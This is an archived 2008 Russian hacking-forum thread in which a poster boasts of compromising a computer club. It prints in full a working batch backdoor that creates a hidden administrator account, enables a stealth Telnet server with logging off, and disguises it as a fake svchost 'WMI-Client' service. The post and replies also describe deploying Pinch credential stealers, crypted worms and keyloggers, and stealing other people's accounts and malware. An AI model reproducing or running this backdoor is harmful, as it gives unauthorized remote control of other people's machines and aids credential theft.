Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Безопасность (https://forum.antichat.xyz/forumdisplay.php?f=41)
-   -   Взлом компьютерного клуба. (https://forum.antichat.xyz/showthread.php?t=80737)

m9chik 13.08.2008 16:15

Взлом компьютерного клуба.
 
В этой статье я просто хочу расскать как я поимел компьюерный клуб.

Есть очень много вариантов взлома клуба,очень. сначало просто самые простые и самые палевные.

1.Вы можите принести usb флешку и сказать что тама находиться фотографии и т.д. или мне надо на неё скачать что либо,у нас в клубе это не прокатывало,такчто можно было получить пинка по голове.

2. Этот вариант впринципе такойже как и 1 токо в деле играют наушники, садишся за стол,двигаеш коробочку,помимо наушников встовляеш флэшку,но и это могут пропалить.

3.Можно тупо принести пинч на дискете админу и сказать "Ну чо зассал открыть?"
p.s. тута можно заранее давать драпу :)

Впринципе всё.

У нас в клубе когда он был была очень хорошая защита и очень палева было много потомучто стол админа находился по верх всех и выгледело примерно так.
http://s44.radikal.ru/i104/0808/4d/8fbefe733dd5.jpg

Поясню может в других компьютерных клубах всё по другому но у нас строже,ничё не принес,заплатил сел,играй и лазий в инете.Также поставили недавненько защиту против всяких сайтов,хрен знает почему,но дейстовало эфективно,админ сразу вставал шол к компу и орал матом,потомучто ему заколебали всплывающие окошки :)

И так...
Был както день плохой,решил сходить в компы...
Тута я начал выберать места для своей коварной мысли поиметь эти сраные компы.
Выбрал "15" потомучто за "16" сидел толстый мужик,и меня не видно было бы,и так как сел немного порубал в игры и начал осматриваться что как...
Увидел что при переписки всего компьютерного клуба в qip сохроняеться в недры какихто странных папок,уже мысль была поднята что сеть кабельная доступ открыт для любому, начал дальше осматриваца я уже разочеровался,потомучто очень много тама нельзя было делать...
Поэтому я вспомнил след. win+R запуск программы,думал номер не пройдёт потомучто очень я боялся защиты... а тута как мёдом намазано вылетело окно :) след я вызвал Notepad и начал фигачить батник ...

@echo off
net localgroup TelnetClients /add
net user admin admin /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.re g
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client


Этопростенький бэк дор который пишеться за щиттаные минуты...

p.s. не думайте что я такой задрот просто у меня в контакте я хроню все батники :) такчто я просто скопировал и всё...

Потом была проблема куда мне загонять,и я решил туда куда валяються все эти логи icq и т.д. такмже я его и запустил.
Впринципе я уже мог щитать что компы уже мои но я хотел очень хорошо повеселиться :)
дальше я пошол домой решил приконектиться через telnet всё было ок особо в то время я сним не дружил поэтому дома залепил прикольчик+пинча+червя+(это т же бэкдор)токо .exe криптанул мне оч хороший человек всё, дальше я залил на рапиду и пошол на след день в компы,получилось так что сел за другой,но ничо я быстро зашол на рапиду скачал этот мой вирусик и запустил, дальше я играл играл и играл,кончилось моё время я пошол домой:) я знал что компьютеров уже нету поскольку поставил задержу,на след день ихние компы никак не работали издавали визг каспирского и время летело со скоростью света )))

p.s. + ещё был в том что у меня под конторелм было сразу 2 машини :)

p.s. я получил около 40 тупых 9 значек, 2 уродские 7значки,зато получил всё об админе :)

p.s. хочу выделить большую благодарность antichat.ru поскольку это был мой самый большой и экстримальный ход :)

Использованные темы:
Pinch
Крипт
бэкдор Сразу извеняюсь,поскольку мою тему на ачате удалили.
Кузя

~Real F@ck!~ 13.08.2008 16:25

Бля лольная история, еле осилил... всё гораздо проще и лучше.

OMG!! 13.08.2008 18:29

Да.. Митник нервно курит в сторонке )))) Молодец

ProTeuS 13.08.2008 18:55

действительно о4ень экстремальный взлом

Dr.Bodja 13.08.2008 19:27

Есть метод намного проще, достаёшь из-за спины АК-47, наводишь на админа, и "Ану быстро пароли от асек давай".
ЗЫ: А Вебкилл наверно, таким способом тоже ламает интернет.

Sn@k3 13.08.2008 20:39

Опасен, я тоже как-то поимел два рядом стоящих комп клубов и один магазин, где компы стоят, правда там мне реально приходилось бежать))) еле ноги унес, магазин багира.

m9chik 13.08.2008 20:48

Цитата:

Сообщение от Sn@k3
Опасен, я тоже как-то поимел два рядом стоящих комп клубов и один магазин, где компы стоят, правда там мне реально приходилось бежать))) еле ноги унес, магазин багира.

былобы интересно почитать как ты это зделал ;)

slider 13.08.2008 21:23

Имха.... слаюшка интересней описал :


http://forum.antichat.ru/showthread.php?p=169220

Sn@k3 13.08.2008 21:24

Ну если интересно, то расскажу про багиру
Ну вообщем обычный магазин, каких полно, отдел продаж, гарантийный отдел и т.д. все в одном месте, только в разных помещениях, ну вообще зашел в отдел продаж, смотрю комп стоит, я впринцыпе знал что там есть комп, в котором есть электронный каталог, ну типа выбираешь что есть чего нет ит.д. за столом был один менеджер, лет ~21 а мне на то время было 17(счас 19), ну вообщем стал за комп, загородил спиной(случайно, но прально что так сделал), вообщем у компа нет клавы, процессор тоже спратан, один монитор и мышь, я тупо тыкаю смотрю девайсы, и т.д. смотрю ссылка на веб сайт, улыбнувшись ткнул по ней, и тут открывается, о чудо, осел, типа ИЕ. =))) немного поскрипев, я нажал на файл, далее открыть, после нгажал обзор а там снова "о чудо =)" вообщем далее я решил включить консоль что и сделал. Далее решил какой-нить фейс оставить, т.к. инета небыло никакх мыслей что даже локалка есть(как позже выяснилось) нет, ну вообщем решил тупо оставить фейс в файле =)(а мне больше и не надо было =) ), т.к. путь был типа
C:\docum....\root\раб... то я решил выйти назад, по частям скопировал прям в консоле "cd" и две точки с заголовка "............-2001." вставил, значит я, хотел перейти назад, но тут понил что без интера не обойтись :D =))))))))))) тут меня облом полный настал....

вообщем закрыл эту байду всю и зашел на диск С (опять браузером:) ), после создал файл мышкой и собрав хоть и на русском законный фейс путем копирования букв с разных папок, время было затрачено минут 15, так что я уже почти закончил, тут кароче подскакивает менеджер со словами, "Вам помочь?", я переполошился и испугался, не успев закрыть все это, пришлось свалить со словами, "да нет, спасибо".

BloodyMessage 13.08.2008 21:28

m9chik, Почитал, вобще интересно, + за старания :)

echobyte 13.08.2008 21:50

В клюбах уже все давно пропинчено.. Везде мне встречаються админы-идиоты, у которых все через задницу.. :(

m9chik 13.08.2008 21:52

ну да,этот клуб тоже не конфетка была,но всё таки... думаю взять с собой парочку человеков и сгонять в хороший клуб,недавно отстроили тама 2-ух ядерки,плазменные экраны,наушники и т.д. :) крутой по ходу...

Nurik 15.09.2008 21:28

прикольно надо будет попробовать у себя у нас админ в клубе только и умеет что вребя ставить ну там просто работник Ddddd

Nurik 15.09.2008 21:29

обоим +1 за интересные истории!)))

Fantasy 15.09.2008 23:10

у нас в компах тож ппц ,админы дауны*,юзвери что хотят трворят...
.........bот кода я летом там работал в компах даж снизилась посещаемость) ......

Devoldini 15.09.2008 23:31

Тупой вопрос, нус сорри :))
Расскажи подробнее, пожалуйста, зачем ты создавал это:
Цитата:

@echo off
net localgroup TelnetClients /add
net user admin admin /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.re g
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client
И в каком виде ты его сохранил? Я так понял, этот файл для телнета? Чтобы можна зайти на комп? О_о

.AkeLLa 15.09.2008 23:55

Цитата:

Сообщение от echobyte
В клюбах уже все давно пропинчено..

Все места заняты :)

lilsaint 17.09.2008 21:07

кульный розказ!!!!!!!

MyTy3 25.09.2008 11:46

МЛЯ А НЕ ПРОЩЕ БЫЛО ОТОСЛАТЬ ПИНЧ НА ПОЧТУ А ПОТОМ ВОЙТИ В ПОЧТУ И СКАЧАТЬ ?? че за тупые у тя мозги

Sainer 28.09.2008 13:41

)) тоже когда то работал админом еще со времен MPacka. Тоже заходит человек садиться за комп напротив меня, тоесть сидит ко мне задом. Он мне сразу не понравился, что то осматривался по сторонам все время на меня оглядывался. Я решил через админку последить чем он занимается, он пытался скачать и открыть свой пинч много способов перепробовал, а у нас прикол в том что можно запускать только ярлыки по директория лазить нельзя и блок стоит на функцию "Открыть файл" когда файл скачиваешь. Он рылься долго пока не нашел ФТП клиент. Повмыкал встал и ушел. Как прошло 2 часа приходит обратно я сразу понял что все слил уже на свою ФТПишку.
Я специально сказал типо сейчас переучет прийдите через 5-10 мин. За это время поставил кейлогер и еще пару софтинок. Посадил его на ту же машину и сижу дальше наблюдаю он справился за 5 мин запустил и ушел, радостный какой то))
Я зашел на его ФТП стоял там последний Mpack, лоадер и еще пару приват софтинок. Все само собой стырял и в лоадер добавил еще и своего пинча))
Он меня конкретно откармливал отчетами еще наверно месяца 3 с него чистых отчетов шло в пару раз больше чем со всех моих источников. Жестко мне понравилось ))

whyl 23.11.2008 01:30

Что за проблема вставить флешку?????? Нахрен этот цирк с наушниками????
Если такой прохаванный лучше скажи как взломать Run Pad Shell


Время: 05:34